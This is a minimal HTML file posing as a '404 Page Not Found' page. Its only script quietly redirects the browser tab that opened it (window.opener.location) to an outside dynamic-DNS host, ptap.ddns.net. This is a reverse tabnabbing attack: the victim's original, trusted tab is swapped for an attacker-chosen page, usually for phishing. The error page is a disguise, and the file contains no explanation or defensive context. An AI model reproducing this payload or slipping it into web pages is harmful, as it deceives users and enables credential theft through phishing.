<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>
    <h1>404 Page Not Found</h1>
    <script type="text/javascript">
      window.opener.location = "http://ptap.ddns.net/item/view"
    </script>
  </body>
</html>
